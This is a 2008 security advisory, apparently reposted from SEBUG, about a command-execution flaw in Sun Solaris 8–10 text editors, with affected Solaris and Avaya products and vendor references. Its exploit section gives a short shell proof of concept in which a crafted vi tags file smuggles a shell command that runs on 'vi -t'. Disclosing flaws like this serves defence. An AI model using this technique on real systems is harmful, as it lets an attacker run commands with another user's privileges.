Sun Solaris text editors are prone to a command-execution vulnerability.
An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer.
Sun Solaris 8, 9, and 10 are affected.
Sun Solaris Text Editors Command Execution Vulnerability
Published:2008-09-17
Vulnerable:
Sun Solaris 9_x86 Update 2
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8
Sun Solaris 10_x86
Sun Solaris 10
Avaya Interactive Response 3.0
Avaya Interactive Response 2.0
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 14.1
Avaya CMS Server 14.0
Avaya CMS Server 13.1
Discription:
<*References
http://groups.google.com/group/comp.editors/msg/f4db1b5aed7ad225*>
http://support.avaya.com/elmodocs2/security/ASA-2008-387.htm
http://sunsolve.sun.com/search/document.do?assetkey=1-66-237987-1
SEBUG Solution:
The vendor has released updates. Please see the references for more information.
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
$ echo "This is line 1" > file1 $ echo "file1line1<TAB>file1<TAB>:1|!touch gotcha" > tags $ ls file1 tags $ vi -t file1line1 :q! $ ls file1 gotcha tags $
// Sebug.net [ 2008-10-04 ]